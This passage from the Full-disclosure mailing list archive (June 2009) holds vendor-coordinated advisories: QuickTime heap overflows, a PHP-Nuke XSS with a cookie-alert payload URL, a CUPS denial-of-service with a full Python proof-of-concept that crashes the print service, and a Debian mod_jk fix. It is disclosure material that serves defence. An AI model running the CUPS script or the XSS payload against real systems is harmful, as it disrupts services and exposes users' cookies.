ZDI-09-027: Apple Quicktime PICT Opcode 0x8201 Heap Overflow Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-09-027 June 2, 2009 -- CVE ID: CVE-2009-0953 -- Affected Vendors: Apple -- Affected Products: Apple Quicktime -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 6664. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple QuickTime. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists in the parsing of PICT files in QuickTime.qts. While processing data for opcode 0x8201 QuickTime trusts a value contained in the file and makes an allocation accordingly. The process then enters a loop whose terminating condition is controlled. The previously allocated heap buffer can be overflowed leading to arbitrary code execution under the context of the user running QuickTime. -- Vendor Response: Apple has issued an update to correct this vulnerability. More details can be found at: http://support.apple.com/kb/HT3591 -- Disclosure Timeline: 2008-12-17 - Vulnerability reported to vendor 2009-06-02 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Sebastian Apelt (sebastian.apelt at siberas.de) -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ From zdi-disclosures at tippingpoint.com Tue Jun 2 18:26:01 2009 From: zdi-disclosures at tippingpoint.com (ZDI Disclosures) Date: Tue, 2 Jun 2009 12:26:01 -0500 Subject: [Full-disclosure] ZDI-09-028: Apple QuickTime CRGN Atom Parsing Heap Buffer Overflow Vulnerability Message-ID: <C64ACAD9.17C90%zdi-disclosures@tippingpoint.com> ZDI-09-028: Apple QuickTime CRGN Atom Parsing Heap Buffer Overflow Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-09-028 June 2, 2009 -- CVE ID: CVE-2009-0954 -- Affected Vendors: Apple -- Affected Products: Apple Quicktime -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 6698. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows attackers to execute arbitrary code on vulnerable installations of QuickTime Player. User interaction is required to exploit this vulnerability in that the target must either open a malicious file, or visit a malicious web page. The specific flaw exists during parsing of Clipping Region (CRGN) atom types in a Quicktime Movie file. The application trusts the contents of the atom to contain a terminator during a copy operation. The application will copy user-supplied data into a heap-buffer until it identifies this terminator. This will allow one to overwrite heap-control structures which can be leveraged to achieve code execution from the context of the application. -- Vendor Response: Apple has issued an update to correct this vulnerability. More details can be found at: http://support.apple.com/kb/HT3591 -- Disclosure Timeline: 2008-12-17 - Vulnerability reported to vendor 2009-06-02 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Anonymous * Damian Put -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ From zdi-disclosures at tippingpoint.com Tue Jun 2 18:26:41 2009 From: zdi-disclosures at tippingpoint.com (ZDI Disclosures) Date: Tue, 2 Jun 2009 12:26:41 -0500 Subject: [Full-disclosure] ZDI-09-029: Apple QuickTime Jpeg2000 Marker Size Heap Overflow Vulnerability Message-ID: <C64ACB01.17C96%zdi-disclosures@tippingpoint.com> ZDI-09-029: Apple QuickTime Jpeg2000 Marker Size Heap Overflow Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-09-029 June 2, 2009 -- CVE ID: CVE-2009-0957 -- Affected Vendors: Apple -- Affected Products: Apple Quicktime -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 8153. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple QuickTime. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists during the parsing of malformed Jpen2000 image files. A field is read directly from the file and used to allocate memory for a structure. If the value read is smaller then the expected structure size then a memory corruption will occur which can be leveraged by an attacker to execute arbitrary code under the context of the current user. -- Vendor Response: Apple has issued an update to correct this vulnerability. More details can be found at: http://support.apple.com/kb/HT3591 -- Disclosure Timeline: 2009-04-28 - Vulnerability reported to vendor 2009-06-02 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Damian Put -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ From zdi-disclosures at tippingpoint.com Tue Jun 2 18:27:27 2009 From: zdi-disclosures at tippingpoint.com (ZDI Disclosures) Date: Tue, 2 Jun 2009 12:27:27 -0500 Subject: [Full-disclosure] ZDI-09-030: Apple Quicktime PICT Opcode 0x71 Heap Overflow Vulnerability Message-ID: <C64ACB2F.17C9C%zdi-disclosures@tippingpoint.com> ZDI-09-030: Apple Quicktime PICT Opcode 0x71 Heap Overflow Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-09-030 June 2, 2009 -- CVE ID: CVE-2009-0010 -- Affected Vendors: Apple -- Affected Products: Apple Quicktime -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 6663. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple QuickTime. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists in the parsing of PICT files in QuickTime.qts. While processing data for opcode 0x71 QuickTime trusts a value contained in the file and makes an allocation accordingly. By providing a malicious value this buffer can be undersized and subsequently can be overflowed leading to arbitrary code execution under the context of the user running QuickTime. -- Vendor Response: Apple has issued an update to correct this vulnerability. More details can be found at: http://support.apple.com/kb/HT3591 -- Disclosure Timeline: 2008-12-17 - Vulnerability reported to vendor 2009-06-02 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Sebastian Apelt (sebastian.apelt at siberas.de) -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ From schap.security at gmail.com Tue Jun 2 21:37:48 2009 From: schap.security at gmail.com (Schap Security) Date: Wed, 3 Jun 2009 02:07:48 +0530 Subject: [Full-disclosure] Cross Site Scripting in PHP Nuke 8.0 Version Message-ID: <922b8380906021337y3e9950b0t569ad8b3bb20b735@mail.gmail.com> Advisory Cross Site Scripting Vulnerability in PHP Nuke 8.0 About PHP Nuke:*PHP-Nuke* is a web-based automated news publishing and content management system based on <http://en.wikipedia.org/wiki/PHP> PHP and MYSQL. The system is fully controlled using a web-based user interface Affected Version : 8.0 Description PHP Nuke version 8.0 is vulnerable to cross site scripting in query parameter in modules.php. The vulnerability can be triggered as : http://www.victime_site.org/modules.php?name=Downloads&d_op=search&query=[XSS] WHERE [XSS] = '';!--"[script]alert(document.cookie)[/script] Kind Regards SCHAP http://www.schap.org -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090603/ae83c34d/attachment.html From advisories at coresecurity.com Tue Jun 2 21:42:47 2009 From: advisories at coresecurity.com (CORE Security Technologies Advisories) Date: Tue, 02 Jun 2009 17:42:47 -0300 Subject: [Full-disclosure] CORE-2009-0420 - Apple CUPS IPP_TAG_UNSUPPORTED Handling null pointer Vulnerability Message-ID: <4A258EC7.8030605@coresecurity.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Core Security Technologies - CoreLabs Advisory http://www.coresecurity.com/corelabs/ Apple CUPS IPP_TAG_UNSUPPORTED Handling null pointer Vulnerability 1. *Advisory Information* Title: Apple CUPS IPP_TAG_UNSUPPORTED Handling null pointer Vulnerability Advisory ID: CORE-2009-0420 Advisory URL: http://www.coresecurity.com/content/AppleCUPS-null-pointer-vulnerability Date published: 2009-06-02 Date of last update: 2009-06-01 Vendors contacted: Apple Computer Inc. Release mode: Coordinated release 2. *Vulnerability Information* Class: Denial of service (DoS) Remotely Exploitable: Yes Locally Exploitable: Yes Bugtraq ID: 35169 CVE Name: CVE-2009-0949 3. *Vulnerability Description* CUPS [1] provides a portable printing layer for UNIX based operating systems. It was developed by Easy Software Products and it is now owned and maintained by Apple Computer Inc. to promote a standard printing solution. It is the standard open source printing system for Mac OS X and other UNIX-like operating systems. A flaw has been identified in CUPS, when handling the 'IPP_TAG_UNSUPPORTED' tag, which could be exploited by attackers to cause a remote pre-authentication denial of service. 4. *Vulnerable packages* . CUPS 1.1.17 . CUPS 1.1.23 . CUPS 1.3.6 . CUPS 1.3.7 . CUPS 1.3.8 . CUPS 1.3.9 . Earlier versions may also be affected, but were not checked. 5. *Non-vulnerable packages* . CUPS 1.3.10 6. *Vendor Information, Solutions and Workarounds* This flaw was fixed in Mac OS X 10.5.7 by updating CUPS to 1.3.10. Apple team intends to fix it on Mac OS X 10.4 in a future update. All CUPS users should upgrade the software to 1.3.10. 7. *Credits* This vulnerability was discovered and researched by Anibal Sacco from the CORE IMPACT Exploit Writing Team (EWT) at Core Security Technologies. 8. *Technical Description / Proof of Concept Code* This vulnerability identified in CUPS is caused by a bad 'ip' structure initialization in the function 'ippReadIO()', located in 'cups/ipp.c', when processing a specially crafted IPP (Internet Printing Protocol) with two consecutives 'IPP_TAG_UNSUPPORTED' tags. This flaw could be exploited by attackers to crash the affected application. At 'ipp.c' the function 'ippReadIO()' is in charge of the initialization of the 'ipp' structure, that represent the different tags of the current IPP request packet. /----------- 1016 ipp_state_t /* O - Current state */ 1017 ippReadIO(void *src, /* I - Data source */ 1018 ipp_iocb_t cb, /* I - Read callback function */ 1019 int blocking, /* I - Use blocking IO? */ 1020 ipp_t *parent, /* I - Parent request, if any */ 1021 ipp_t *ipp) /* I - IPP data */ 1022 { 1023 int n; /* Length of data */ 1024 unsigned char buffer[IPP_MAX_LENGTH + 1], 1025 /* Data buffer */ 1026 string[IPP_MAX_NAME], 1027 /* Small string buffer */ 1028 *bufptr; /* Pointer into buffer */ 1029 ipp_attribute_t *attr; /* Current attribute */ 1030 ipp_tag_t tag; /* Current tag */ 1031 ipp_tag_t value_tag; /* Current value tag */ 1032 ipp_value_t *value; /* Current value */ 1035 DEBUG_printf(("ippReadIO(%p, %p, %d, %p, %p)\n", src, cb, blocking, 1036 parent, ipp)); 1037 DEBUG_printf(("ippReadIO: ipp->state=%d\n", ipp->state)); 1039 if (src == NULL || ipp == NULL) 1040 return (IPP_ERROR); 1041 1042 switch (ipp->state) 1043 { 1044 case IPP_IDLE : 1045 ipp->state ++; /* Avoid common problem... */ 1046 1047 case IPP_HEADER : 1048 if (parent == NULL) - -----------/ As we can see in the code above, the packets can count with a few different tag attributes. When an 'IPP' packet is sent with a tag attribute lower than 0x10, it is considered by CUPS as an 'IPP_TAG_UNSUPPORTED' tag: /----------- else if (tag < IPP_TAG_UNSUPPORTED_VALUE) { /* * Group tag... Set the current group and continue... */ if (ipp->curtag == tag) ipp->prev = ippAddSeparator(ipp); else if (ipp->current) ipp->prev = ipp->current; ipp->curtag = tag; ipp->current = NULL; DEBUG_printf(("ippReadIO: group tag = %x, ipp->prev=%p\n", tag, ipp->prev)); continue; } - -----------/ Because of the way that CUPS handles this kind of tags, if a packet contains two consecutives 'IPP_TAG_UNSUPPORTED', the last node of the IPP structure will be initialized as 'NULL'. This will lead to a crash when the 'cupsdProcessIPPRequest' function tries to read the 'name' field of the 'attr' structure. /----------- /* * 'cupsdProcessIPPRequest()' - Process an incoming IPP request. */ int /* O - 1 on success, 0 on failure */ cupsdProcessIPPRequest( cupsd_client_t *con) /* I - Client connection */ ... if (!attr) { /* * Then make sure that the first three attributes are: * * attributes-charset * attributes-natural-language * printer-uri/job-uri */ attr = con->request->attrs; if (attr && !strcmp(attr->name, "attributes-charset") && (attr->value_tag & IPP_TAG_MASK) == IPP_TAG_CHARSET) charset = attr; else charset = NULL; ... - -----------/ 8.1. *Proof of Concept* The following Python script is the proof of concept written by Anibal Sacco to trigger the vulnerability. /----------- from struct import pack import sys import socket class IppRequest: """ Little class to implement a basic Internet Printing Protocol """ def __init__(self, host, port, printers, hpgl_data="a"): self.printers = printers self.host = host self.port = port self.hpgl_data = hpgl_data self.get_ipp_request() def attribute(self, tag, name, value): data = pack('>B',tag) data += pack('>H',len(name)) data += name data += pack('>H',len(value)) data += value return data def get_http_request(self): http_request = "POST /printers/%s HTTP/1.1\r\n" % self.printers http_request += "Content-Type: application/ipp\r\n" http_request += "User-Agent: Internet Print Provider\r\n" http_request += "Host: %s\r\n" % self.host http_request += "Content-Length: %d\r\n" % len(self.ipp_data) http_request += "Connection: Keep-Alive\r\n" http_request += "Cache-Control: no-cache\r\n" return http_request def get_ipp_request(self): operation_attr = self.attribute(0x47, 'attributes-charset', 'utf-8') operation_attr += self.attribute(0x48, 'attributes-natural-language', 'en-us') operation_attr += self.attribute(0x45, 'printer-uri', "http://%s:%s/printers/%s" % (self.host, self.port, self.printers)) operation_attr += self.attribute(0x42, 'job-name', 'foo barrrrrrrr') operation_attr += self.attribute(0x42, 'document-format', 'application/vnd.hp-HPGL') self.ipp_data = "\x01\x00" # version-number: 1.0 self.ipp_data += "\x00\x02" # operation-id: Print-job self.ipp_data += "\x00\x00\x00\x01" # request-id: 1 self.ipp_data += "\x01" # operation-attributes-tag self.ipp_data += "\x0f\x0f" # self.ipp_data += operation_attr self.ipp_data += "\x02" # job-attributes-tag self.ipp_data += "\x03" # end-of-attributes-tag self.ipp_data += self.hpgl_data; return self.ipp_data def main(): try: printer = sys.argv[1] host = sys.argv[2] except: print "[+] Usage: exploit printer_name host" return 0 data = "A"*100 ipp = IppRequest(host,"80", printer, data) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) print "[+] Connecting to the host" s.connect((host, 631)) #requests = ipp.get_http_request() #for each in requests: # s.send(each) print "[+] Sending request" s.send(ipp.get_http_request()) s.send("\r\n") print "[+] Sending ipp data" s.send(ipp.get_ipp_request()) print "Response:%s" % s.recv(1024) print "done!" if __name__ == "__main__": sys.exit(main()) - -----------/ 9. *Report Timeline* . 2009-04-28: Core Security Technologies notifies the Apple Product Security Team of the vulnerability and announces its initial plan to publish the advisory on May 20th, 2009. Technical details and Proof of Concept (PoC) are sent to Apple Security Team. . 2009-04-28: The vendor acknowledges reception of the technical report and PoC. . 2009-05-11: Core reminds Apple Security Team its initial plan to publish the advisory on May 20th, and asks the confirmation that patches will be released by then. . 2009-05-12: Core notifies Apple Security Team that this is a multi-vendor issue (affecting, for example, multiple Linux distributions), and asks if the patch process of the CUPS vulnerability will be coordinated using the vendor-sec mailing list [2]. . 2009-05-12: Apple Product Security Team notifies Core they will contact vendor-sec about this issue very soon and proposes to reschedule the advisory publication date to June 2nd. The vendor also notifies the issue was addressed in Mac OS X 10.5.7 by updating CUPS to version 1.3.10. . 2009-05-13: Apple Product Security Team notifies the suggested fix would be to update to CUPS 1.3.10. . 2009-05-15: The Red Hat Security Response Team informs (via vendor-sec) CUPS 1.1.17 is the oldest version they still ship and it is affected too. This issue will probably affect even earlier CUPS versions too. . 2009-05-25: The Debian Team informs (via vendor-sec) there is a bug in the PoC provided by Core. The advisory PoC is changed according to the comments made by Debian Team. . 2009-05-28: Core notifies that the advisory is going to be released on June 2nd, and requests a confirmation from Apple Security Team and vendor-sec subscribers. . 2009-05-29: Apple Security Team, Red Hat Security Response Team and Debian Team confirm the proposed release date. There was no request for embargo date shift posted to vendor-sec. . 2009-06-02: The advisory CORE-2009-0420 is published. 10. *References* [1] http://www.cups.org. [2] Vendor-sec, a mailing list dedicated to distributors of operating systems using (but not necessarily solely comprised of) free and open-source software. http://oss-security.openwall.org/wiki/mailing-lists/vendor-sec. 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs. 12. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2009 Core Security Technologies and (c) 2009 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.7 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFKJY7HyNibggitWa0RAtcuAJ9vxQ4OjXhyOepyzgUg8WvG8rCMlACgsUTK A3cfFRppX8VCa6hzPcVEOiw= =G46K -----END PGP SIGNATURE----- From schap.security at gmail.com Tue Jun 2 21:29:55 2009 From: schap.security at gmail.com (Schap Security) Date: Wed, 3 Jun 2009 01:59:55 +0530 Subject: [Full-disclosure] BitDefender | World Wide Pay - SQL Injection / LFI / XSS Message-ID: <922b8380906021329ydc6ea24m839e8d2afc389733@mail.gmail.com> Hi The bit defender sql injection is re stated again. A severe sql injection has been noticed in the bitdefender [ir] website. It is possible to extract all records from the system. The world wide pay website suffers from local file inclusion and cross site scripting. For proof of concept: http://schap.org/advisories.html There vulnerabilities are reported but no generic response from vendor. Kind Regards SCHAP http://www.schap.org -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090603/375dab3a/attachment.html From sf at debian.org Tue Jun 2 20:40:04 2009 From: sf at debian.org (Stefan Fritsch) Date: Tue, 2 Jun 2009 21:40:04 +0200 Subject: [Full-disclosure] [SECURITY] [DSA 1810-1] New libapache-mod-jk packages fix information disclosure Message-ID: <20090602194004.GA15022@galadriel.inutil.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1810-1 security at debian.org http://www.debian.org/security/ Stefan Fritsch June 02, 2009 http://www.debian.org/security/faq - ------------------------------------------------------------------------ Package : libapache-mod-jk Vulnerability : information disclosure Problem type : remote Debian-specific: no CVE ID : CVE-2008-5519 Debian Bug : 523054 An information disclosure flaw was found in mod_jk, the Tomcat Connector module for Apache. If a buggy client included the "Content-Length" header without providing request body data, or if a client sent repeated equests very quickly, one client could obtain a response intended for another client. For the stable distribution (lenny), this problem has been fixed in version 1:1.2.26-2+lenny1. The oldstable distribution (etch), this problem has been fixed in version 1:1.2.18-3etch2. For the testing distribution (squeeze) and the unstable distribution (sid), this problem has been fixed in version 1:1.2.26-2.1. We recommend that you upgrade your libapache-mod-jk packages. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - ------------------------------- Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/liba/libapache-mod-jk/libapache-mod-jk_1.2.18-3etch2.dsc Size/MD5 checksum: 935 dc3dd860d8c7a2710943903b485b1afa http://security.debian.org/pool/updates/main/liba/libapache-mod-jk/libapache-mod-jk_1.2.18-3etch2.diff.gz Size/MD5 checksum: 11556 889ac12a51c93772cefad6af5225f7f7 http://security.debian.org/pool/updates/main/liba/libapache-mod-jk/libapache-mod-jk_1.2.18.orig.tar.gz Size/MD5 checksum: 929823 58e1b9406e0cfe11bd4bc297ba146b4f Architecture independent packages: http://security.debian.org/pool/updates/main/liba/libapache-mod-jk/libapache-mod-jk-doc_1.2.18-3etch2_all.deb Size/MD5 checksum: 118140 04190ed8b2fc8fea1bf98b1b1df14e9b alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/liba/libapache-mod-jk/libapache2-mod-jk_1.2.18-3etch2_alpha.deb Size/MD5 checksum: 101802 b21ab36fc88cf555f9afe1f181124030 http://security.debian.org/pool/updates/main/liba/libapache-mod-jk/libapache-mod-jk_1.2.18-3etch2_alpha.deb Size/MD5 checksum: 98112 29507ac73774562be5c8824cbbcc9131 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/liba/libapache-mod-jk/libapache2-mod-jk_1.2.18-3etch2_amd64.deb Size/MD5 checksum: 97470 5a137194ffad6aca9bdfa2760447d635 http://security.debian.org/pool/updates/main/liba/libapache-mod-jk/libapache-mod-jk_1.2.18-3etch2_amd64.deb Size/MD5 checksum: 93722 8642501f8588c5cf7fc990ccdd23ec4b arm architecture (ARM) http://security.debian.org/pool/updates/main/liba/libapache-mod-jk/libapache2-mod-jk_1.2.18-3etch2_arm.deb Size/MD5 checksum: 92860 e11d9d8cf00d6aa71a369d99c92b23f4 http://security.debian.org/pool/updates/main/liba/libapache-mod-jk/libapache-mod-jk_1.2.18-3etch2_arm.deb Size/MD5 checksum: 89258 11fbf05bce072618c3f229c2986e23a6 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/liba/libapache-mod-jk/libapache-mod-jk_1.2.18-3etch2_hppa.deb Size/MD5 checksum: 102432 400787b4e1bc663e2a9dc3c0127c4e73 http://security.debian.org/pool/updates/main/liba/libapache-mod-jk/libapache2-mod-jk_1.2.18-3etch2_hppa.deb Size/MD5 checksum: 106314 63572306d8c9d8ea8c47e66b809195fd i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/liba/libapache-mod-jk/libapache2-mod-jk_1.2.18-3etch2_i386.deb Size/MD5 checksum: 93386 92d553ae68620971f9b81d81400cc7aa http://security.debian.org/pool/updates/main/liba/libapache-mod-jk/libapache-mod-jk_1.2.18-3etch2_i386.deb Size/MD5 checksum: 89482 028881fdbf37c27de6fa3edd8fbd05c4 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/liba/libapache-mod-jk/libapache-mod-jk_1.2.18-3etch2_ia64.deb Size/MD5 checksum: 120858 6919a34dfa3dfee634a9642604a3e8ff http://security.debian.org/pool/updates/main/liba/libapache-mod-jk/libapache2-mod-jk_1.2.18-3etch2_ia64.deb Size/MD5 checksum: 125960 cba7d736e52cabbe70de29f0e51cddf5 mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/liba/libapache-mod-jk/libapache-mod-jk_1.2.18-3etch2_mips.deb Size/MD5 checksum: 86614 4c1700cd9242c833fa22dfad073756c6 http://security.debian.org/pool/updates/main/liba/libapache-mod-jk/libapache2-mod-jk_1.2.18-3etch2_mips.deb Size/MD5 checksum: 89758 e41ac894937a180111156157498843ab mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/liba/libapache-mod-jk/libapache2-mod-jk_1.2.18-3etch2_mipsel.deb Size/MD5 checksum: 89858 aa269380dffa92119aa9004f82f98da2 http://security.debian.org/pool/updates/main/liba/libapache-mod-jk/libapache-mod-jk_1.2.18-3etch2_mipsel.deb Size/MD5 checksum: 86710 769d82a08a391758a712b944f54b0cbb powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/liba/libapache-mod-jk/libapache2-mod-jk_1.2.18-3etch2_powerpc.deb Size/MD5 checksum: 93420 f576dbcb12dec39481126d4d2b40ffe9 http://security.debian.org/pool/updates/main/liba/libapache-mod-jk/libapache-mod-jk_1.2.18-3etch2_powerpc.deb Size/MD5 checksum: 90220 5716b5070274952d35957e07f33742c0 s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/liba/libapache-mod-jk/libapache2-mod-jk_1.2.18-3etch2_s390.deb Size/MD5 checksum: 99948 897e7b4cd9acb4a1a735d4e1a49474c9 http://security.debian.org/pool/updates/main/liba/libapache-mod-jk/libapache-mod-jk_1.2.18-3etch2_s390.deb Size/MD5 checksum: 96176 d8f44d62414bc99fcf4360eb64d29b37 sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/liba/libapache-mod-jk/libapache-mod-jk_1.2.18-3etch2_sparc.deb Size/MD5 checksum: 87926 0084f3bdb917e99f666d8fa7832d0b2a http://security.debian.org/pool/updates/main/liba/libapache-mod-jk/libapache2-mod-jk_1.2.18-3etch2_sparc.deb Size/MD5 checksum: 91398 7ed7eedb497a1a0cecab652eb3bc1195 Debian GNU/Linux 5.0 alias lenny - -------------------------------- Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/liba/libapache-mod-jk/libapache-mod-jk_1.2.26-2+lenny1.dsc Size/MD5 checksum: 1336 7070da05cbe8200e7d92dbfe9228ab0e http://security.debian.org/pool/updates/main/liba/libapache-mod-jk/libapache-mod-jk_1.2.26.orig.tar.gz Size/MD5 checksum: 1442605 feaec245136bc4d99a9dde95a00ea93c http://security.debian.org/pool/updates/main/liba/libapache-mod-jk/libapache-mod-jk_1.2.26-2+lenny1.diff.gz Size/MD5 checksum: 12187 8b6e6b0abd76bae90c99c50ab1fee027 Architecture independent packages: http://security.debian.org/pool/updates/main/liba/libapache-mod-jk/libapache-mod-jk-doc_1.2.26-2+lenny1_all.deb Size/MD5 checksum: 169998 d31f4efe7b78e94bf1c7cffabce17c6b alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/liba/libapache-mod-jk/libapache2-mod-jk_1.2.26-2+lenny1_alpha.deb Size/MD5 checksum: 125008 0a99d6364abf9b5934dfe0814c9ac589 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/liba/libapache-mod-jk/libapache2-mod-jk_1.2.26-2+lenny1_amd64.deb Size/MD5 checksum: 127806 84fe833769ac2a4cda17fb6f48b3ca6d arm architecture (ARM) http://security.debian.org/pool/updates/main/liba/libapache-mod-jk/libapache2-mod-jk_1.2.26-2+lenny1_arm.deb Size/MD5 checksum: 130600 81d9d588db9c29c0ff58d9fd395ffdd6 armel architecture (ARM EABI) http://security.debian.org/pool/updates/main/liba/libapache-mod-jk/libapache2-mod-jk_1.2.26-2+lenny1_armel.deb Size/MD5 checksum: 133242 efa4faa96460d23682eb36958f475994 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/liba/libapache-mod-jk/libapache2-mod-jk_1.2.26-2+lenny1_hppa.deb Size/MD5 checksum: 126034 45135481a1cc2689b9c5b6910fca0b03 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/liba/libapache-mod-jk/libapache2-mod-jk_1.2.26-2+lenny1_i386.deb Size/MD5 checksum: 109874 bf54bb8f3489715932e5a07739a63dc4 ia64 architecture (Intel ia64) 